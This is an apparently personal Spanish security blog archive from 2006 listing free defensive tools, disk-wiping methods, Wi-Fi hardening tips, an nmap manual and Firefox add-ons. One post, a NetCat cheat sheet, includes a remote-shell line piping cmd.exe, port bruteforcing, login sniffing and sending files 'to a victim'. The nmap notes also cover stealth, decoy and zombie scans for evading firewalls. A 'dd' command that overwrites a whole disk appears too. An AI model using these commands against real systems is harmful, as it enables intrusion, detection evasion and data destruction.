LO QUE NO SE DA... SE PIERDE: 2006

Friday, December 15, 2006

Wednesday, November 15, 2006

Fiddle es un Proxy HTTP que registra todo el tráfico que se produce entre tu ordenador e Internet, permite inspeccionar todo el trafico HTTP, establecer puntos de parada y modificar tanto los datos de entrada como de salida. Fiddle esta diseñado para que su uso sea mucho mas sencillo que trabajar con NetMon o Achilles, se integra con el navegador y incluye soporte mediante scripts para el marcado y edición automáticos de peticiones y respuestas HTTP

Más información y descarga en la siguiente URL: http://www.fiddlertool.com/fiddler/

En http://www.Milw0rm.com, website dedicado por entero a seguridad informática y desde donde se pueden descargar exploits, shellcodes, etc& se ha publicado una guía rápida con ejemplos de cómo funcionan los principales ataques que se utilizan en las intrusiones de aplicaciones Web. SQL Injection, XSS, RFI, WebTrojans, Hijacking,& . Es un manual rápido pero muy interesante.

Lo puedes descargar desde la siguiente URL: http://www.milw0rm.com/papers/111

Con la llegada de Internet Explorer 7 las diferentes casas de antivirus se han puesto las pilas para desarrollar lo que en ciertos ámbitos no se ha dudado en calificar como una autentica revolución en el mundo de los antivirus, En esta nueva generación se prometen soluciones más rápidas, menos pesadas, mas eficaces e incluso, dotados con motores heurísticos basados en redes neuronales.

Podéis ver un avance de uno de estos nuevos sistemas en:
htp://www.youtube.com/watch?v=0Q_hSXqsmTA

Monday, September 18, 2006

Aplicaciones de Seguridad Gratuitas para güin

El objetivo de esta recopilación es ofrecer a los usuarios de plataformas Windows enlaces a aplicaciones libres y/o gratuítas que puedan ser evaluadas y empleadas sin coste alguno por aquellos que lo estimen oportuno.

Este conjunto de herramientas proporcionan al usuario seguridad en distintas facetas que requieren que al menos se tomen unas mínimas medidas de precaución para evitar incidentes indeseables, como la intrusión, la pérdida de información o la contaminación por virus, entre un total de 20 campos de seguridad básicos.

IMPORTANTE: Ninguna de estas aplicaciones ni sus posibles combinaciones ofrece seguridad total a los usuarios. Las recomendaciones hechas sólo están basadas en el factor coste nulo, y nunca en virtud a un análisis exhaustivo de ninguno de los productos, ni de su calidad. El único parámetro considerado ha sido la gratuidad de los programas.

1. Navegación segura

Las mejores opciones actuales son, sin duda, Opera y Firefox, cuyo histórico de vulnerabilidades es muy inferior al de Internet Explorer, navegador que a todas luces no se recomienda. Ambos programas son gratuítos, y en el caso de Firefox, se puede instalar una barra antiphishing que informa de sitios potencialmente fraudulentos. La barra de Netcraft puede ser interesante para proporcionar además de información técnica, protección antiphishing.

Opera

Firefox

Barra Antiphishing para Firefox

Barra de Netcraft

K-Meleon

K-Meleon Nauscópico

2. Correo electrónico seguro

La recomendación natural para gestionar el correo de una manera segura y eficiente es Mozilla Thunderbird. Para complementar la seguridad de las comunicaciones, es aconsejable emplear algún sistema de privacidad como GnuPG, un sustituto libre de PGP, que también tiene una versión gratuíta.

Mozilla Thunderbird

GnuPG

PGP Free

3. Antivirus

Existen muchas aplicaciones antivirus en el mercado. Dentro de los productos que ofrecen versiones gratuítas para empleo doméstico y no comercial, suele hablarse muy bien de Avast!. Como todo buen antivirus, la misión de Avast! es impedir que nos contaminemos por virus y otro malware. Ofrece actualizaciones automáticas, protección residente, y defensa para P2P, mensajería instantánea y Web. Como no podía ser de otro modo, escanea y desinfecta. Otro antivirus decente es AVG Free. AntiVir también tiene una versión gratuíta. Ewido ofrece una suite de seguridad. Hande solicita la incorporación de ClamWin.

Avast! Home

AVG Free Edition

AntiVir Personal Edition

Ewido Security Suite

ClamWin

4. Antimalware

El clásico por excelencia es sin duda, Ad-Aware, que también tiene una edición para uso doméstico y personal gratuíta. Este producto está especialmente indicado para detectar spyware en las máquinas y eliminarlo. Otro producto aconsejable es Spybot Search and Destroy. Spywareguard proporciona bloqueo en tiempo real contra el spyware más usual. Malware Destroyer elimina amenazas de este tipo. Por último, Emsisoft tiene un buen ramillete de aplicaciones antitroyanos y antispyware gratuítas. Añadimos igualmente Windows Defender, a petición de Juan. Hande nos recuerda que existe Winpooch.

Ad-Aware SE Personal

Spybot Search and Destroy

Spywareguard

Malware Destroyer

Herramientas Emsisoft

Windows Defender

Winpooch

5. Firewall

De entre los muchos productos existentes para firewall, vamos a citar a un clásico. Zone Alarm, cuya versión doméstica básica es igualmente gratuíta. El objetivo de un firewall es proporcionar una línea de defensa consistente en la protección contra intrusiones, si bien puede ser empleado además para controlar qué aplicaciones conectan a la Internet en todo momento, pudiendo elegir si permitir o no las comunicaciones de cada programa que tengamos. Además de Zone Alarm, otro firewall gratuíto popular es Kerio, de Sunbelt. maty aconseja incluír Jetico, que también tiene una versión traducida en Nauscopio.

Zone Alarm

Kerio Personal Firewall

Jetico Personal Firewall

Jetico Personal Firewall versión Nauscopio

6. Privacidad

Los programas de limpieza de trazas proporcionan al usuario borrado seguro de las trazas de actividad en un terminal informático. El programa más aconsejable es CCleaner, que proporciona control sobre el borrado de temporales, histórico de navegador, cookies, lista de autocomplete, index.dat para Internet Explorer, borrado de papelera de reciclaje, documentos recientes y un sinfín de información que queda almacenada cuando empleamos un sistema Windows. Contiene herramientas para el borrado de trazas en otras aplicaciones de terceros, como Opera, Media Player, eMule, Kazaa, Google Toolbar, Netscape, MS Office, Nero, Adobe Acrobat, WinRAR, WinAce y WinZip.

Además, contiene un gestor-optimizador del registro, control sobre los programas que el sistema carga al inicio y un desinstalador. Para fines similares, también existe Cleanup!

CCleaner

Cleanup!

7. Almacenamiento seguro de claves

La cantidad de claves que se manejan en el día a día de la navegación hace indispensable emplear un gestor de claves seguro, que permite almacenar las claves que empleamos para así, de un modo seguro, no tener que recordarlas constantemente. En este ámbito es posible recomendar KeePass, así como el conocido Password Safe. También podemos, a petición de maty, hablar de PINs.

KeePass

Password Safe

PINs versión Nautopia

8. Analizadores de tráfico

El objetivo de este tipo de programas es poder controlar el tráfico al que está sometida nuestra red local, como fuente de información de posibles ataques. De entre los muchos programas posibles, recomendar Ethereal es lo más sensato, por su amplia tradición y por sus buenos resultados.

Ethereal

9. Gestión segura de ficheros

La gestión segura para no sólo por el borrado seguro, sino por la conservación segura. Almacenar ficheros sin protección puede ser peligroso, y a la hora de borrar, es recomendable eliminarlos de un modo igualmente seguro, que impida recuperaciones indeseadas. Recomendamos Eraser, Blowfish Advanced CS y Axcrypt.

Borrado seguro con Eraser

Cifrado seguro con Blowfish Advanced CS (sirve también para el borrado seguro)

Cifrado de ficheros con Axcrypt

10. Gestión segura de discos duros

Para gestionar de modo seguro un disco duro debemos contemplar dos tipos de herramientas: borrado seguro de discos completos y cifrado de discos completos. DBAN y Truecrypt pueden servirnos para estos propósitos.

Borrado seguro de discos con Darik´s Boot and Nuke (es una aplicación Linux pero que se ejecuta a modo de live CD)

Cifrado de discos con TrueCrypt

11. Herramientas para comprender los términos de licencia

Los términos de licencia pueden incluír aspectos interesantes sobre la seguridad y la responsabilidad de los productos que usamos. Así por ejemplo, los EULAs (End User License Agreements) contienen información sobre estos aspectos. Eulalyzer selecciona y muestra las partes relevantes de esos acuerdos que nadie suele leer.

Eulalyzer

12. Filtros antispam para el correo electrónico

El spam además de molesto, puede contener malware e intentos de engaño. Lo más aconsejable es filtrar el correo siempre. Mozilla Thunderbird tiene un buen motor antispam integrado, pero es posible instalar motores independientes para un filtrado más intenso. Podemos aconsejar Spambayes y Ella for Spam Control, además de Spampal y Mailwasher.

Spambayes

Ella for Spam Control

Spampal

Mailwasher

13. Sistemas de detección de intrusión

Para evitar las intrusiones no deseadas, existe un buen número de aplicaciones. De carácter gratuíto son Prevx Home y Winpatrol. Añadimos aquí Snort para Windows, por indicación de Juan.

Prevx Home

WinPatrol

Snort W32

14. Protección WiFi

Si bien no hay mecanismos exactos para asegurar las conexiones WiFi, podemos emplear software de apoyo, como por ejemplo Air Defense Personal, orientado a la protección de nuestros Hotspots. Para sondear la disponibilidad de redes, y por tanto, para ver cómo está la nuestra, podemos emplear NetStumbler.

Air Defense Personal

NetStumbler

15. Escáneres de vulnerabilidades

Estos programas enumeran los problemas de seguridad que potencialmente existen en nuestro ordenador. El programa por excelencia es Nessus, si bien para plataformas Windows es aconsejable ejecutar de vez en cuando el Microsoft Security Baseline Analyzer. Para servidores, Windows Server Update Services (véase comentario de josemaria)

Nessus

Microsoft Security Baseline Analyzer

Windows Server Update Services (Gratuíto, pero requiere registro)

16. Escáneres de puertos y de red

Es conveniente saber qué puertos tenemos abiertos, ya que los puertos abiertos son la puerta de entrada a nuestra red para los atacantes. El escáner más popular es Nmap. Para escaneos de la red, LanSpy. Coffee nos recomienda Active Ports.

Nmap

LanSpy

Active Ports

17. Escáneres de vulnerabilidades Web

Los webmasters y propietarios de Web pueden emplear escáneres web automáticos para detectar vulnerabilidades en sus sitios. N-Stealth Free y SiteDigger son dos herramientas ideadas para este propósito.

N-Stealth Free

SiteDigger

18. Análisis de comunicaciones Bluetooth

Los aparatos bluetooth son cada vez más populares. Existen herramientas para monitorizar la actividad Bluetooth en nuestro alcance. Una de ellas es Bluesweep.

BlueSweep (requiere registro)

19. Sistema

Algunas herramientas permiten evaluar el rendimiento del sistema y monitorizar la actividad del mismo. Esto puede ser interesante igualmente a efectos de seguridad. Whatsrunning es una herramienta que proporciona este tipo de información. Otra posible recomendación es la versión Lite de Sandra, de SiSoft. Los usuarios deberían también ojear las Sysinternals Freeware.

Juan nos recuerda que anda por ahí Microsoft Shared Computer Toolkit.

Whatsrunning

SiSoft Sandra Lite

Sysinternals Freeware

Microsoft Shared Computer Toolkit.

20. Entornos de investigación

Estos entornos proporcionan al usuario (avanzado, lógicamente) herramientas de investigación. El proyecto Metasploit nació para desarrollar, probar y usar código exploit, pero puede ser empleado con fines éticos, para test de penetración e investigación de vulnerabilidades. No es una herramienta destinada al usuario en general, sino más bien al usuario avanzado.

Metasploit

Espero os sea de utilidad

Tuesday, September 12, 2006

Métodos de Borrado Seguro

Método de borrado	Definición	Nivel de seguridad
Grado 1. Super Fast Zero Write	Sobreescritura del soporte con un valor fijo (0x00) en cada tercer sector.	Bajo
Grad 2. Fast Zero Write	Sobreescritura del soporte con un valor fijo (0x00) en cada sector.	Bajo
Grado 3. Zero Write	Sobreescritura del soporte con un valor fijo (0x00) en todo el área al completo.	Bajo
Grado 4. Random Write	Sobreescritura del soporte con valores aleatorios. Su fiabilidad aumenta con el número de pasadas.	Medio
Grado 5. Random & Zero Write	Después de sobreescribir el soporte con valores aleatorios, se vuelve a sobreescribir de nuevo con un valor fijo (0x00), sobreescribe con valores aleatorios y termina con escritura de valor cero; este método es más seguro que Zero Write.	Medio
Grado 6. US Navy, NAVSO P-5239-26 – MFM	Estándar de la Armada estadounidense (US Navy) NAVSO P-5239-26 para discos codificados con MFM (Modified Frequency Modulation). El método consiste en la escritura de un valor fijo (0xffffffff) sobre el soporte, después un valor fijo (0xbfffffff), y finalmente una serie de valores aleatorios. El área de datos se lee para verificar la sobreescritura. El método suele ser aplicado sobre disquetes.	Medio
Grado 7. US Navy, NAVSO P-5239-26 – RLL	Estándar de la Armada estadounidense (US Navy) NAVSO P-5239-26 para discos codificados con RLL (Run Length Limited). Este método aplica la escritura de un valor fijo (0xffffffff) sobre el soporte grabado, un valor fijo (0x27ffffff), y finaliza con valores aleatorios. El área de datos se lee para verificar la sobreescritura. El método es aplicable a discos duros y soportes ópticos como el CD, DVD o el disco BlueRay.	Medio
Grado 8. Bit Toggle	Sobreescritura de toda la zona de datos cuatro veces, primero con el valor (0x00), sigue con el valor (0xff), luego (0x00) y finaliza con (0xff).	Medio
Grado 9. Random Random Zero	Sobreescritura del soporte dos veces con valores aleatorios, una vez más con un valor fijo (0x00). Vuelta a sobreescribir dos veces con valores aleatorios y una última vez con ceros; el método es más seguro que Random & Zero Write.	Medio
Grado 10. US Department of Defense (DoD 5220.22-M)	Este método de borrado fue introducido por el Departamento de Defensa de los EE.UU. (Pentágono) y es conocido como "DoD5220.22-M". El método consiste en la sobreescritura del soporte con un valor fijo determinado una vez (por ejemplo 0x00), seguidamente se escribe su valor complementario (0xff) una vez, y finalmente se repasa con valores aleatorios una vez. El disco se verifica para comprobar la escritura correcta de los valores.	Medio
Grado 11. US Air Force, AFSSI5020	Estándar de las Fuerzas Aéreas de los EE.UU. (US Air Force) AFSSI5020. Este método de borrado primero sobreescribe el soporte con un valor fijo (0x00), después otro valor fijo (0xff), y finalmente un valor aleatorio constante. Se comprueba al menos un 10% del disco para verificar la sobreescritura.	Medio
Grado 12. North Atlantic Treaty Organization - NATO standard	Estándar de borrado de la OTAN (North Atlantic Treaty Organization). Sobreescribe el soporte siete veces. Las primeras seis pasadas son de sobreescritura con valores fijos alternativos entre cada pasada (0x00) y (0xff). La séptima pasada sobreescribe con un valor aleatorio.	Alto
Grado 13. Peter Gutmann Secure Deletion	El método fue creado po Peter Gutmann en 1996. Probablemente sea el método de borrado de datos más seguro que existe sin combinación con otros métodos. La sobreescritura del soporte se realiza grabando valores aleatorios cuatro veces sobre cada sector. Seguidamente se sobreescribirá todo el soporte con valores pseudoaleatorios sobre cada sector durante veintisiete pasadas. Para terminar, se escribirán valores aleatorios durante cuatro pasadas sobre cada sector. En total, se realizan treinta y cinco pasadas de sobreescritura.	Alto
Grado 14. US Department of Defense (DoD 5220.22-M) + Gutmann Method	Método de alta seguridad consistente en 35 pasadas, complementables con iteraciones de Mersenne, para agilizar los procesos de borrado seguro mediante la generación de números pseudoaleatorios. Combina el Grado 13 y el 10.	Muy Alto

No está de más comentar un comando como dd. Dicho comando, aplicado en la forma, por ejemplo dd if=/dev/urandom of=/dev/hda aplica una capa extra de seguridad a la hora de formatear un disco duro (en el ejemplo copia datos aleatorios sobre todo el dispositivo /dev/hda)

Enlaces:
Darik´s Boot and Nuke -
http://dban.sourceforge.net/

East-Tec Eraser -
http://www.east-tec.com/

FrozenTech's LiveCD List -
http://www.frozentech.com/content/livecd.php

Wednesday, August 23, 2006

Usos de NetCat

Ejecutar un shell en máquina remota
nc -l -p 23 xxx.xxx.xxx.xx 23 -t -e cmd.exe

Estudiar puertos
nc -v (puedes añadir otra -v)

Bruteforce en un puerto
nc -v 79 < user.txt > log.txt
(envía user.txt y guarda la respuesta en log.txt)

Scanner de puertos en localhost (rango 1-53)
nc -v -v -z 127.0.0.1 1-53

Sniffer en pantalla
nc -v -v -L 127.0.0.1 -p 23

Sniffer en un log
nc -v -v -L -p 23 127.0.0.1 -t >login.txt

Conexiones no autorizadas en un puerto
nc -u -v -v -L -p 31337 127.0.0.1 31337

Mandar un archivo a víctima
nc -v -v -L -p 21 nombre del host -t < login.txt

Breve manual sobre uno de los clásicos, el escaneador de puertos "nmap"

Nmap es un programa para entornos Linux diseñado para escanear redes y determinar que servidores se encuentran activos y que servicios ofrecen. Nmap proporciona tambien caracteristicas avanzadas como la detección remota del sistema operativo por medio de huellas TCP/IP , escaneo tipo stealth (oculto), retraso dinámico y cálculos de retransmisión, escaneo paralelo, detección de servidores inactivos por medio de pings paralelos, escaneo con señuelos,etc. Vamos a ver algunas de las posibilidades que ofrece:

Tipos de escaneo

-sT(Escaneo TCP connect())
Se usa para establecer una conexion con todos los puertos interesantes de la máquina

-sS (Escaneo TCP SYN)
No abre una conexión TCP completa. Se envia un paquete SYN y se espera a la respuesta. Un SYN/ACK indica que el puerto está a la escucha y se envia un RST para cortar la conexión. Se necesitan privilegios de Root para construir estos paquetes

-sF -sX -sN(Modos Stealth FIN, Xmas Tree o Nul scan)
La idea es que se requie re que los puertos cerrados respondan a nuestro paquete de prueba con un RST, mientras que los puertos abiertos deben ignorar los paquetes en cuestion
El escaneo FIN utiliza un paquete FIN vacio (sorpresa) como prueba,Xmas tree
activa las flags FIN, URG y PUSH y NULL desactiva todas las flags.Si el escaneo encuentra puertos cerrados, probablemente se trate de una maquina UNIX, mientras que todos los puertos abiertos es indicativo de Windows.

-sP (Escaneo ping)
Algunos sitios web como microsoft.com pueden rechazar este tipo de paquetes

-sU (Escaneo Udp)
Este metodo se usa para saber que puertos UDP (Protocolo de Datagrama de Usuario, RFC 768) estan abiertos en un servidor.

-b (ataque de rebote ftp)
Se usa un servidor ftp que este detras de un firewall como proxy para escanear las máquinas que puedan estar detras del mismo. El formato es:nombre_de_usuario:password@servidor:puerto

Archivos interesantes de nmap

/usr/share/nmap

8 drwxr-xr-x 2 root root 4096 Feb 17 14:34 .
8 drwxr-xr-x 162 root root 4096 Feb 18 16:41 ..
12 -rw-r--r-- 1 root root 8107 Apr 21 2008 nmap.dtd
192 -rw-r--r-- 1 root root 186909 Apr 21 2008 nmap-mac-prefixes
624 -rw-r--r-- 1 root root 627864 Apr 21 2008 nmap-os-fingerprints
16 -rw-r--r-- 1 root root 8361 Apr 21 2008 nmap-protocols
20 -rw-r--r-- 1 root root 15985 Apr 21 2008 nmap-rpc
180 -rw-r--r-- 1 root root 172950 Apr 21 2008 nmap-service-probes
116 -rw-r--r-- 1 root root 106784 Apr 21 2008 nmap-services
24 -rw-r--r-- 1 root root 18978 Apr 21 2008 nmap.xsl

Opciones Generales

-p0
No intenta hacer ping a un servidor antes de escanearlo.(microsoft.com)

-PT
Usa el ping TCP para determinar que servidores estan activos. En vez de enviar paquetes de peticion de ecos ICMP y esperar una respuesta, se lanzan paquetes TCP ACK y se espera a que lleguen las respuestas.

-PS
Esta opcion usa paquetes SYN en vez de los paquetes ACK para usuarios root.

-PI
Esta opcion usa una peticion de eco ICMP. Encuentra servidores que estan activos y tambien busca direcciones de broadcast dirigidas a subredes en una red. Se trata de direcciones

-PB
Este es el tipo de ping por defecto. Usa los barridos ACK ( -PT ) e ICMP ( -PI ) en paralelo.

-O
Esta opcion activa la deteccion remota del sistema operativo por medio de la huella TCP/IP y lo compara con una base de datos de conocidas huellas TCP/IP para decidir que tipo de sistema se esta escaneando

-p
Esta opcion determina los puertos que se quieren especificar.

-i
Lee especificaciones de servidores o redes de destino a partir del archivo especificado en vez de hacerlo de la linea de comandos.

-g
Establece el numero de puerto de origen a usar en los escaneos.

-h
Ayuda sobre los comandos de nmap

--packet_trace
nmap imprime información detallada de cada paquete que envía y recibe

--version_trace
Resumen de packet_trace detallando la versión del servicio

-sI : Idle scan que se basa en numeros de secuencia predecibles para lanzar ataques a traves de equipos zombies (las impresoras jetdirect son buenas candidatas)

#nmap -p 3467 -P0 -sI IP_zombie IP_objetivo

-b : opción utilizada para realizar escaneos utilizando algunos servidores FTP como proxys o relays de escaneos. Tecnica de escaneos por rebote

-D : opción decoy para camuflar dentro de un rango de direcciones la IP de origen del escaneo

#nmap -P0 -D IP_decoy IP_objetivo

-L : opción que permite listar y resolver Ips sin escanear

#nmap -sL 192.168.2.1-120

EJEMPLOS

#nmap -v objetivo.ejemplo.com

Escanear todos los puertos TCP reservados de una maquina

#nmap -v -p 80 '*.*.2.3-5'

Encontrar servidores web en maquinas cuyas direcciones IP terminen en .2.3, .2.4

#nmap -v -sS -O www.miweb.net 192.168.2.0/24 '192.88-90.*.*'

Escanea con SYNs detectando el sistema operativo destino en diferentes hosts

#nmap -p 443 -O -sV 192.168.2.1

Escanea el puerto 443 del host intentando adivinar las aplicaciones que se ejecutan

#nmap -sU -A -T Insane 192.168.2.1

Escanea con UDP y -A=( -sV y -O) de forma agresiva presentando resultados rápidos

#nmap -T Insane -n -O -sS 192.168.2.*

Escanea toda la red con SYNs de forma agresiva y detectando sistemas operativos

#nmap -oA nmaplog 192.168.2.1

Escanea y escribe logs de diferentes tipos al archivo nmaplog

#nmap -p 3389 -P0 -sF 192.168.2.1 FIN SCAN

Escanea con FIN scan sin ping el puerto 3389. Más silencioso para los FWs/IDSs

Cuando un puerto está cerrado habitualmente el host responde con un RESET , cuando está abierto o filtrado no envía nada por lo que se puede obtener un listado de puertos decente si esto lo combinamos con la opción -sV que nos dice el tipo de servicio que está escuchando

#nmap -p 3389 -P0 -sX 192.168.2.1 XMAS SCAN

Similar al FIN scan pero activa los flags URG y PUSH

#nmap -p 3389 -P0 -sN 192.168.2.1 NULL SCAN

No activa flags de los paquetes

#nmap -P0 --packet_trace 192.168.2.1

Escanea con trazas detalladas

Thursday, August 10, 2006

10 pasos para blindar APs

1.Usar WPA-PSK[1] con tkip[2] (AES[3] tira demasiado de CPU en los aps baratos)
2.Establecer una laaaaaarga contraseña WPA-PSK[4]
3.Baja la potencia de transmisión, algunos firmwares cómo sveasoft[5] para linksys te dan esa posibilidad, si no es el caso, orienta las antenas hacia el suelo, mételo en un armario, o pinta la habitación[6]
4.Si utilizas tarjetas 802.11g, selecciona ese modo en el AP, (no el híbrido b/g),
así aumentarás el rendimiento y alejarás a las wifi-suckers que están haciendo wardriving
con sus tarjetas con chipset Prism. Además, algunos ataques DOS[7] no son practicables en modo g nativo con tarjetas b, algo parecido en Draft 1.0 IEEE 802.11n[8], selecciona el modo "turbo/N/buzzword" para únicamente permitir la conexión a tus dispositivos
5.Habilita el HTTPS en el router y usa exclusivamente ese método para conectarte a él, así por lo menos, los sniffer de aire no te leerán las pass en texto plano, si ya, con un MITM [9] te la pueden leer igual, pero mejor poco que nada :)
6.El filtrado MAC es muy fácil de saltar y un coñazo de mantener, más si tienes varios APs y muchxs colegas...
7.Si puedes segmentar la red, háztelo ahí, así tu tráfico "cableado" nunca saldrá al aire.
8.Activa el modo de aislamiento(se llama PSPF en cisco, en linksys se llama Wireless Cliente isolation mode, y cada fabricante le llama de una manera...) con lo que evitas la comunicación entre clientes en la capa 2..tendrás que inhabilitarlo si quieres imprimir, conectar a otro cliente...
9.Cambia la MAC de tu AP, si el firmware te lo permite, clona la MAC WAN[10], o simplemente identifícalo con una MAC de otro fabricante
10.Desactiva TODO lo que no estés usando en el AP (UpnP, STP, etc), si tienes un servidor montado, tunela con OpenVPN[11]

[1].-http://www.ubuntu-es.org/node/12416
[2].-http://en.wikipedia.org/wiki/TKIP
[3].-http://es.wikipedia.org/wiki/AES
[4].-http://www.kurtm.net/wpa-pskgen/
[5].-http://barrapunto.com/article.pl?sid=05/01/16/1646228&mode=thread
[6].-http://www.forcefieldwireless.com/products.html
[7].-http://en.wikipedia.org/wiki/Denial-of-service_attack
[8].-http://www.camyna.com/wordpress/?p=1151
[9].-http://en.wikipedia.org/wiki/MITM
[10].-http://docs.sveasoft.com/SV-WRT54GHardware.html
[11].-http://openvpn.net/

Algo de Wifi

Network Simulator tiene un wiki nuevo..
Las Pruebas de concepto de Raw Wireless están muy interesantes
Hasta el 20 de agosto se está desplegando el Wireless Comunity Camp...muy interesante
Esta distro promete, pero sólo para Atheros :(
En este link está las compatibilidades con aircrack-ng

Introducción al estándar IEEE 802.11 (Presentaciones)

Estándares IEEE:

WiMAX
- Estudio de mercado de las espectativas de WiMax
- Tutorial de WiMax del WiMax Forum

Despliegue de redes inalámbricas

Seguridad en las redes inalámbricas

Mecanismos "alternativos" de seguridad

Pintura WiFi

Black Alchemy Fake AP

WarDriving

Antenas direccionales
- Construcción de antenas direccionales caseras. Herramienta on-line para el cálculo de las dimensiones.

Google wireless:
- Buscador de páginas adaptadas para dispositivos inalámbricos de pequeñas dimensiones.
- Buscador de redes WiFi

Localización de HotSpots
- Red Kubiwireless (España)

Herramientas Software, Drivers y Manuales

Friday, August 04, 2006

Herramientas de diseño de redes

Open Source
Nagios
OpenNMS,
son, en mi opinión, muy rudimentarias
knetmap
Es perfecta, problema que sólo es para KDE, y Linux, of course

Comercial
SmartDraw™
Visio
netViz™
Neon LANsurveyor

Conclusión
Si lo que quieres es que el torpe de tu jefe se entere de lo que hay,
habla con San Antonio (aka Patrón de los imposibles)
y si comunica, con SmartDraw&trade y Visio vas que te matas.

Si quieres tener medianamente documentada tu red:
netViz&trade y LANSurveyor.

Wednesday, August 02, 2006

Ozono

criterios para la declaración de los niveles de contaminación

PRINCIPALES CONTAMINANTES ATMOSFERICOS, FUENTES Y EFECTOS SOBRE LA SALUD

Efectos en morbilidad asociados a Ozono

Saturday, July 29, 2006

Mapeando la web

Internet Infrastructure Maps

Internet Geography Maps

http://awis.blogspot.com/2005/06/mapping-internet.html

Thursday, July 27, 2006

Recomendaciones contra el malware

Consejos contra el malware

Consejos contra el malware (II)

Consejos contra el malware (III)

Consejos contra el malware (IV)

Uso correcto de claves

Navegacion Segura

Más Recomendaciones

Wednesday, July 26, 2006

Pen Test

Este documento (pdf, inglés, 500 KB, 28 páginas) presenta un esquema bastante completo de los pasos a seguir para completar un test de penetración en un determinado sitio web, desde la información extraíble mediante una simple visita y el uso de herramientas online (Google, Whois y otras), hasta la utilización de aquellas herramientas específicas que permiten obtener resultados concretos.

Un buen artículo

Guía de implantación de sistemas de gestión de la seguridad de la
información.

FOROSEC es un proyecto subvencionado por el Ministerio de Industria,
Turismo y Comercio que tiene como objetivo establecer una red experta
en seguridad informática enfocada a mejorar la competitividad de las
PYMES en los servicios de negocio electrónico.
Los organizadores del proyecto son cuatro centros especializados en
TICs y seguridad informática:
* AIMME (Instituto Tecnológico Metalmecánico),
* ESI (European Software Institute),
* IAT (Instituto Andaluz de Tecnología) y
* ROBOTIKER.

Esta guía está redactada en un lenguaje sencillo y puede ser un
material muy interesante para realizar una primera aproximación al
mundo de los sistemas de gestión de la seguridad de la información
(SGSI). En el documento vienen desmenuzadas las diferentes fases del
proceso, los documentos mínimos a generar y cuales deben ser los
principios y objetivos de abordar un proyecto de semejante
transcendencia e importancia para la organización. El desarrollo de la
metodología para la implementación acercará a las personas con
interés en el tema a cada una de las actividades a desarrollar dentro
del diseño y construcción del SGSI.
Por último destacar también el anexo 2 en donde se establecen unas
pautas y consejos para la elaboración de procedimientos de seguridad.

El documento puede ser descargado en el enlace
http://www.forosec.com/documentos/Guia_de_Implantacion_de_SGSI.pdf

Saturday, July 22, 2006

Addons interesantes

Mozilla

firebug https://addons.mozilla.org/firefox/1843/
pasar a minusculas: https://addons.mozilla.org/firefox/2516/

Firefox

Adblock:Adblock es un eficaz filtro anti-publicidad para los navegadores Mozilla y Mozilla Firefox, que mejora ostensiblemente la fiabilidad y robustez del filtro integrado en esos navegadores.
https://addons.mozilla.org/firefox/10/

Autocopy:Con esta extensión cualquier texto que seleccionemos dentro del navegador se pasará automáticamente al portapapeles pudiéndolo pegar luego donde sea
http://downloads.mozdev.org/autocopy/autocopy-v0.5.4.xpi

BackupFox:podrás crear una copia de seguridad de ambos perfiles de forma completa, es decir, no sólo las extensiones o los Favoritos de Internet. Si lo deseas, puedes excluir la memoria caché del navegador.
http://mhtools.knoware.nl/raptor/backupfox/backupfox073.zip

BBCodeXtra:Añade comandos BBCode/HTML/XHTML al menú contextual con los que podrás insertar las etiquetas (HTML,BBCode,....) que quieras en cualquier cuadro de texto de una página web como por ejemplo en los cuadros de texto de respuesta de cualquier foro
https://addons.mozilla.org/firefox/491/

Bugmenot:extensión que se conecta al conocido servicio BugMeNot y te logea fácilmente en los sitios que requiere de registro previo. (Muy útil)
http://roachfiend.com/archives/2005/02/07/bugmenot/

Chatzilla:ChatZilla es una extensión un tanto particular para el navegador web Mozilla Firefox. Con ella podrás conectarte a tus redes y canales favoritos de IRC, de una forma sencilla y desde el propio navegador.
https://addons.mozilla.org/firefox/16/

Colorful Tabs:Te pone cada pestañita de un color
https://addons.mozilla.org/firefox/1368/

Cutemenus: añade pequeñas imágenes en las opciones que aparecen al pulsar con el botón derecho del ratón en las páginas; también añade las imágenes a los menús de "Archivo, Editar..."
https://addons.mozilla.org/firefox/1330/

del.icio.us:te permite gestionar tu cuenta de del.icio-us, un sistema de Favoritos de Internet online.
https://addons.mozilla.org/firefox/2354/

Disable Target For Downloads:Impide que FF abra una ventana vacía al iniciar una descarga
https://addons.mozilla.org/firefox/241/

download statusbar:podrás seguir disfrutando de toda la funcionalidad del gestor de descargas de Firefox desde la barra de estado del navegador.
https://addons.mozilla.org/firefox/26/

Downthemall:te permite controlar al detalle todas las descargas que realices desde un sitio web
https://addons.mozilla.org/firefox/201/

fasterfox:Esta extensión para Firefox permite acelerar el rendimiento de este excelente navegador rápidamente y de forma muy sencilla, ya que para lograrlo basta con elegir entre las diferentes configuraciones que ofrece.
https://addons.mozilla.org/firefox/1269/

Favicon Picker:Esta extensión añade una opción para reemplazar los iconos de los marcadores.
http://personal.telefonica.terra.es/extension/faviconpicker/faviconpicker-0.2.5-es-ES.xpi

fireFTP:te permite tener integrado un cliente de FTP en el propio navegador
https://addons.mozilla.org/firefox/684/

Firetune:te permite ajustar algunas opciones ocultas del navegador Mozilla Firefox, con la finalidad de optimizar su rendimiento y acelerar la carga de páginas web y la navegación en la medida de lo posible.
http://www.majorgeeks.com/download4534.html

flashgot:podrás integrar tu gestor de descargas de toda la vida en tu navegador
https://addons.mozilla.org/firefox/220/

FLST:Devuelve el foco (se posiciona) en la pestaña anterior en que estuvimos al cerrar la pestaña activa.
https://addons.mozilla.org/firefox/32/

Footiefox:FootieFox es una extensión para Firefox especialmente pensada para los más futboleros que quieran estar informados de los goles de su equipo favorito, selección nacional o incluso de otras ligas
https://addons.mozilla.org/firefox/725/

Forescastfox:obten predicciones del tiempo de cualquier parte del mundo y las muestra en la barra de estado , altamente personalizable https://addons.mozilla.org/firefox/398/

Foxytunes:te permite controlar la reproducción de música desde la ventana del propio navegador, haciendo uso de una serie de botones que se instalan en la parte inferior de la misma.
https://addons.mozilla.org/firefox/219/

gmail notifier:puedes controlar la llegada de nuevos mensajes a tu cuenta Gmail, configurándolo para que lo compruebe cada cierto tiempo y avisándote con una pequeña ventanita en caso de que tengas nuevos mensajes.
https://addons.mozilla.org/firefox/173/

googlePreview:te permite previsualizar una imagen de los resultados obtenidos en tus búsquedas en Internet, agilizando el proceso de encontrar exactamente aquello que buscas.
https://addons.mozilla.org/firefox/189/

IE tab:Permite ver paginas con el motor de internet explorer dentro del navegador, sirve para ver las paginas que solo se pueden abrir con el IE
https://addons.mozilla.org/firefox/1419/

